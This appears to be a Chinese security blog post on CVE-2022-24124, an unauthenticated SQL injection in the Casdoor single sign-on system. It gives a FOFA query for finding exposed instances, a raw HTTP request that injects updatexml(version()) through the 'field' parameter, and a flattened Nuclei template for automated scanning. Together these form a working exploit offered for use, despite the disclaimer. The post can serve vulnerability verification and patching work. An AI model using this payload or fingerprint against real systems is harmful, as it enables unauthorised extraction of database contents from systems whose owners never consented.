声明:此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!
现在只对常读和星标的公众号才展示大图推送,建议大家把猫蛋儿安全“设为星标”,否则可能看不到了!
产品简介
Casdoor是一个开源的身份认证系统,它支持OAuth2.0、LDAP、OIDC、SAML、CAS等多种认证方式。Casdoor可以作为单点登录(SSO)系统,允许用户在多个应用之间无缝切换,无需重复登录。
Casdoor的主要特点包括:
1. 支持多种认证方式:包括OAuth2.0、LDAP、OIDC、SAML、CAS等。
2. 用户管理:提供用户的增删改查,以及密码重置、用户分组等功能。
3. 权限管理:支持基于角色的访问控制(RBAC),可以细粒度地控制用户的权限。
4. 提供Web界面:所有的操作都可以通过Web界面完成,易于使用。
5. 支持多种语言:包括Go、Java、Node.js、Python、PHP、.Net等。
漏洞简介
Casdoor 是一个开源的,基于 OAuth 2.0 / OIDC 的中心化的单点登录(SSO)身份验证平台,简单来说,就是 Casdoor 可以帮你解决用户管理的难题,你无需开发用户登录、注册等与用户鉴权相关的一系列功能,只需几个步骤进行简单配置,与你的主应用配合,便可完全托管你的用户模块,简单省心,功能强大。Casdoor单点登录系统存在未授权SQL注入漏洞,攻击者可利用该漏洞获取数据库敏感信息。
指纹识别
fofa:title="Casdoor"
漏洞验证
poc:
GET /api/get-organizations?p=123&pageSize=123&value=cfx&sortField&sortOrder&field=updatexml(null,version(),null) HTTP/1.1Host: {hostname}User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflate DNT: 1Connection: closeUpgrade-Insecure-Requests: 1
发送POC:
自动化验证:
id: CVE-2022-24124info:name: Casdoor 1.13.0 - Unauthenticated SQL Injectionauthor: cckuailongseverity: highdescription: Casdoor version 1.13.0 suffers from a remote unauthenticated SQL injection vulnerability via the query API in Casdoor before 1.13.1 related to the field and value parameters, as demonstrated by api/get-organizations.remediation: |Upgrade to a patched version of Casdoor or apply the necessary security patches to mitigate the SQL injection vulnerability.reference:https://packetstormsecurity.com/files/166163/Casdoor-1.13.0-SQL-Injection.htmlhttps://www.exploit-db.com/exploits/50792https://github.com/cckuailong/reapoc/tree/main/2022/CVE-2022-24124/vultargethttps://nvd.nist.gov/vuln/detail/CVE-2022-24124https://github.com/casdoor/casdoor/compare/v1.13.0...v1.13.1classification:: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N: 7.5: CVE-2022-24124: CWE-89: 0.01169: 0.83341cpe: cpe:2.3:a:casbin:casdoor:*:*:*:*:*:*:*:*metadata:: 1vendor: casbinproduct: "casdoor": http.title:"Casdoor"tags: sqli,unauth,packetstorm,edb,cve,cve2022,casdoorhttp:method: GETpath:"{{BaseURL}}/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(1,version(),1)": andmatchers:type: regexpart: bodyregex:"XPATH syntax error.*'""casdoor"condition: andtype: statusstatus:200# digest: 4a0a0047304502206fbfbe0849f11ab4312533d7d23b42fbb2dd9bd1e9a36b6f20c0579e54a088a5022100a422ef18ddfd6b06b2c60991dfacadf3d1f8e866e9ad549e930da0c1df004f1d:922c64590222798bb761d5b6d8e72950
漏洞收录
漏洞已收录于团队内部漏洞库(建设于2019年),现已收集4000+实战漏洞
现仅供团队内部使用,每月随机抽取关注者加入社群交流学习。
回复关键字【POC】获取POC下载链接
点击下方名片进入公众号,欢迎关注!
点个小赞你最好看
原文始发于微信公众号(猫蛋儿安全):【1day】Casdoor单点登录系统SQL注入CVE-2022-24124【附POC】
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论